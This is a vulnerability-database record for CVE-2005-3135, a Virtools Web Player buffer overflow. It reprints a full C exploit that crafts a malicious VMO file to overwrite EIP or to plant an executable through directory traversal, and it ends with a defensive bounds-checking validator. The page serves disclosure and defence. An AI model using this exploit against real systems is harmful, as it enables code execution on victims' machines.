CVE-2005-3135
CVSS7.5
Published: 2005-10-04 18:02:00
Revised: 2016-10-17 23:33:01
NMCOE

[Original] Buffer overflow in Virtools Web Player 3.0.0.100 and earlier allows remote attackers to execute arbitrary code via a long filename.


[CNNVD] Virtools Web Player Buffer Overflow Vulnerability (CNNVD-200510-003)

        Virtools Web Player is the player required to run content exported from Virtools to a web page.
        Virtools Web Player 3.0.0.100 and earlier contain a buffer overflow; a remote attacker can execute arbitrary code via a long filename.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3135
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3135
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-003
(Official data source) CNNVD

- Other links and resources

http://aluigi.altervista.org/adv/virtbugs-adv.txt
(VENDOR_ADVISORY)  MISC  http://aluigi.altervista.org/adv/virtbugs-adv.txt
http://marc.info/?l=bugtraq&m=112811771331997&w=2
(UNKNOWN)  BUGTRAQ  20050930 Buffer-overflow and directory traversal bugs in Virtools Web Player
http://securitytracker.com/id?1014993
(UNKNOWN)  SECTRACK  1014993
http://www.securityfocus.com/bid/14990
(UNKNOWN)  BID  14990

- Vulnerability information

Virtools Web Player Buffer Overflow Vulnerability
High severity  Buffer overflow
2005-10-04 00:00:00 2005-10-20 00:00:00
Remote
        Virtools Web Player is the player required to run content exported from Virtools to a web page.
        Virtools Web Player 3.0.0.100 and earlier contain a buffer overflow; a remote attacker can execute arbitrary code via a long filename.

- Advisories and patches

        No data

- Vulnerability information (1239)

Virtools Web Player <= 3.0.0.100 Buffer Overflow DoS Exploit (EDBID:1239)
windows dos
2005-10-02 Verified
0 Luigi Auriemma
N/A
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#ifdef WIN32
    #include <io.h>

    typedef unsigned char   u_char;
    typedef unsigned int    u_int;
    #define ftruncate   chsize
#else
    #include <unistd.h>
    #include <sys/types.h>
#endif



#define VER     "0.1"
#define SIGN    "Nemo"
#define FILE1   "components"
#define FILE2   "objects"
#define FMT     "%-10u"
#define EIP     "\xde\xc0\xad\xde"
#define BOF     "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aa" EIP
#define BOFFILE "Nemo il pesce scemo"



u_int putfile(FILE *fdout, char *fname);
void std_err(void);



struct {
    u_char  sign[4];
    u_int   unknown1;   // 0x694620
    u_int   crc;        // ???
    u_int   unknown2;   // big-endian sdk version?
    u_int   plugin1;
    u_int   plugin2;
    u_int   unknown3;   // 12
    u_int   compcsz;
    u_int   objcsz;
    u_int   objsz;
    u_int   addpath;    // ???
    u_int   components;
    u_int   objects;
    u_int   zero;       // ???
    u_int   version;
    u_int   compsz;
} vmo;



int main(int argc, char *argv[]) {
    FILE    *fd;
    u_int   i,
            len,
            off;
    int     attack;
    u_char  fname[512];
    char    *vmofile,       // argv strings are plain char *, not u_char *
            *addfile,
            *addpath;


    setbuf(stdout, NULL);

    fputs("\n"
        "Virtools <= 3.0.0.100 buffer-overflow and directory traversal bugs "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <file.VMO>\n"
            "\n"
            "Attack:\n"
            " 1 = buffer-overflow\n"
            " 2 = directory traversal, is needed to specify also the file to add and the\n"
            "     special path for exploiting the bug\n"
            "\n"
            "Example: virtbugs 1 tintoys.vmo\n"
            "Example: virtbugs 2 tintoys.vmo malicious.exe ..\\..\\..\\..\\windows\\runme.pif\n"
            "Note:    will be replaced only the latest file in the package\n"
            "Note:    if you need a quick VMO file use the following:\n"
            "           http://www.virtools.com/downloads/vmo/Tintoys/tintoys.vmo"
            "\n", argv[0]);
        exit(1);
    }

    attack  = atoi(argv[1]);
    vmofile = argv[2];

    if((attack != 1) && (attack != 2)) {
        fputs("\nError: wrong attack number chosen\n\n", stdout);
        exit(1);
    }

    printf("- open VMO file:    %s\n", vmofile);
    fd = fopen(vmofile, "r+b");
    if(!fd) std_err();

    if(!fread(&vmo, sizeof(vmo), 1, fd)) std_err();
    off = ftell(fd);

    if(memcmp(vmo.sign, SIGN, sizeof(vmo.sign))) {
        printf("- file seems invalid, its sign is: %.*s\n",
            (int)sizeof(vmo.sign), vmo.sign);   // %.* expects an int precision
    }

    printf(
        "  Informations and files list:\n"
        "- components:       %u\n"
        "- objects:          %u\n"
        "- version:          %hhu.%hhu.%hhu.%hhu\n"
        "\n",
        vmo.components,
        vmo.objects,
        (vmo.version >> 24) & 0xff, (vmo.version >> 16) & 0xff,
        (vmo.version >> 8)  & 0xff, vmo.version & 0xff);

    fputs(
        "  inSize     outSize    Filename\n"
        "  ------------------------------\n", stdout);

    printf("  "FMT" "FMT" %s\n", vmo.compcsz, vmo.compsz, FILE1);
    printf("  "FMT" "FMT" %s\n", vmo.objcsz,  vmo.objsz,  FILE2);
    if(fseek(fd, off + vmo.compcsz + vmo.objcsz, SEEK_SET) < 0) std_err();

    for(i = 2; ; i++) {
        if(!fread(&len, 4, 1, fd)) break;
        off = ftell(fd) - 4;

        // bounds check BEFORE reading the name into the fixed buffer,
        // otherwise a long name in the input file overflows fname itself
        if(len > (sizeof(fname) - 1)) break;
        if(!fread(fname, len, 1, fd)) break;    // a zero length ends the list
        fname[len] = 0;
        if(!*fname) break;

        if(!fread(&len, 4, 1, fd)) break;
        printf("             "FMT" %s\n", len, fname);

        if(fseek(fd, len, SEEK_CUR) < 0) std_err();
    }

    if(i <= 2) {
        fputs("\n"
            "Error: your VMO file doesn't contain additional files so cannot be modified\n"
            "       try with another\n"
            "\n", stdout);
        exit(1);
    }

    fseek(fd, off, SEEK_SET);

    if(attack == 1) {
        fputs("\n- buffer-overflow bug exploitation\n", stdout);
        len = sizeof(BOF) - 1;
        fwrite(&len, 4, 1, fd);
        fwrite(BOF, len, 1, fd);

        len = sizeof(BOFFILE) - 1;
        fwrite(&len, 4, 1, fd);
        fwrite(BOFFILE, len, 1, fd);

    } else if(attack == 2) {
        fputs("\n- directory traversal bug exploitation\n", stdout);
        if(argc < 5) {
            fputs("\nError: you must specify also <your_file> and <bad_path>\n\n", stdout);
            exit(1);
        }
        addfile = argv[3];
        addpath = argv[4];

        len = strlen(addpath);
        fwrite(&len, 4, 1, fd);
        fwrite(addpath, len, 1, fd);

        len = putfile(fd, addfile);
    }

    fflush(fd);
    if(ftruncate(fileno(fd), ftell(fd)) < 0) std_err();
    fflush(fd);
    fclose(fd);
    printf("- added a file of %u bytes\n", len);
    return(0);
}



u_int putfile(FILE *fdout, char *fname) {
    struct stat xstat;
    FILE    *fdin;
    u_int   len,
            tot = 0;
    u_char  buff[1024];

    fdin = fopen(fname, "rb");
    if(!fdin) std_err();
    fstat(fileno(fdin), &xstat);

    fwrite(&xstat.st_size, 4, 1, fdout);

    while((len = fread(buff, 1, sizeof(buff), fdin))) {
        fwrite(buff, len, 1, fdout);
        tot += len;
    }

    fclose(fdin);
    return(tot);
}



void std_err(void) {
    perror("\nError");
    exit(1);
}

// milw0rm.com [2005-10-02]

- Vulnerability information

19815
Virtools Web Player Filename Processing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A remote overflow exists in Virtools Web Player. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted file containing an overly long filename, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.
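The description above names the defect precisely: a fixed-size buffer receives a filename whose length comes from the file itself, with no check that it fits. The checker below is an added example written for this record; it is not Virtools' code and not part of the original advisory or exploit. It assumes the file-list layout that the public exploit walks (repeated 4-byte little-endian name length, name, 4-byte data length, data, ending at a zero name length), an assumed MAX_NAME limit of 255 bytes, and constructed sample packages built in memory. It validates every length against the remaining input before copying, which is the check the player lacked, and also flags names that would escape the extraction directory, the second bug from the same advisory.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Largest filename this checker will copy into its fixed buffer.
 * Assumed for this example; it is not Virtools' real limit. */
#define MAX_NAME 255

enum vmo_check {
    VMO_OK = 0,
    VMO_TRUNCATED,      /* a length field points past the end of the data */
    VMO_NAME_TOO_LONG,  /* name would not fit a fixed buffer: the overflow trigger */
    VMO_TRAVERSAL       /* name escapes the extraction directory */
};

static uint32_t rd32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Walk a VMO-style trailing file list (assumed layout, taken from how the
 * public exploit reads it): [u32 namelen][name][u32 datalen][data] ...,
 * ending at a zero name length or end of data. Every length is checked
 * against the remaining input BEFORE any copy. Returns the first problem. */
enum vmo_check check_vmo_entries(const uint8_t *buf, size_t n, size_t *entries) {
    char name[MAX_NAME + 1];
    size_t pos = 0, count = 0;

    while (n - pos >= 4) {
        uint32_t namelen = rd32le(buf + pos);
        pos += 4;
        if (namelen == 0) break;                        /* end marker */
        if (namelen > MAX_NAME) return VMO_NAME_TOO_LONG;
        if (namelen > n - pos) return VMO_TRUNCATED;
        memcpy(name, buf + pos, namelen);
        name[namelen] = '\0';
        pos += namelen;

        /* Reject absolute paths, drive letters and ".." components. */
        if (name[0] == '/' || name[0] == '\\' || strstr(name, "..") != NULL ||
            (namelen >= 2 && name[1] == ':'))
            return VMO_TRAVERSAL;

        if (n - pos < 4) return VMO_TRUNCATED;
        uint32_t datalen = rd32le(buf + pos);
        pos += 4;
        if (datalen > n - pos) return VMO_TRUNCATED;
        pos += datalen;                                 /* skip the file body */
        count++;
    }
    if (entries) *entries = count;
    return VMO_OK;
}

/* Helpers to build constructed sample packages (not real Virtools files). */
static size_t put_u32(uint8_t *out, uint32_t v) {
    out[0] = v & 0xff; out[1] = (v >> 8) & 0xff;
    out[2] = (v >> 16) & 0xff; out[3] = (v >> 24) & 0xff;
    return 4;
}

static size_t put_entry(uint8_t *out, const char *name, size_t namelen) {
    size_t n = put_u32(out, (uint32_t)namelen);
    memcpy(out + n, name, namelen);  n += namelen;
    n += put_u32(out + n, 1);                           /* one-byte file body */
    out[n++] = 'x';
    return n;
}

enum vmo_check demo_benign(void) {                      /* one entry + end marker */
    uint8_t buf[64]; size_t n = put_entry(buf, "tintoys.cmo", 11);
    n += put_u32(buf + n, 0);
    return check_vmo_entries(buf, n, NULL);
}

enum vmo_check demo_overlong_name(void) {               /* 300-byte name > MAX_NAME */
    uint8_t buf[512]; char name[300];
    memset(name, 'a', sizeof name);
    return check_vmo_entries(buf, put_entry(buf, name, sizeof name), NULL);
}

enum vmo_check demo_traversal(void) {                   /* constructed ".." name */
    uint8_t buf[64]; const char *name = "..\\..\\sample.txt";
    return check_vmo_entries(buf, put_entry(buf, name, strlen(name)), NULL);
}

enum vmo_check demo_truncated(void) {                   /* claims 40 bytes, has 10 */
    uint8_t buf[64]; size_t n = put_u32(buf, 40);
    memset(buf + n, 'b', 10); n += 10;
    return check_vmo_entries(buf, n, NULL);
}

int main(void) {
    printf("benign=%d overlong=%d traversal=%d truncated=%d\n", demo_benign(),
           demo_overlong_name(), demo_traversal(), demo_truncated());
    return 0;
}
```

The ordering inside the loop is the whole point: the length is compared with both the destination buffer and the bytes actually remaining before memcpy runs, so a hostile length can at worst make the checker reject the file. A parser that copies first and checks afterwards (the pattern the original exploit's own reading loop showed) has already overflowed by the time the check executes.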

- Timeline

2005-09-30 Unknown
2005-09-30 Unknown

- Solution

Upgrade to version 3.0.0.101 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see the "About this site" page.

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.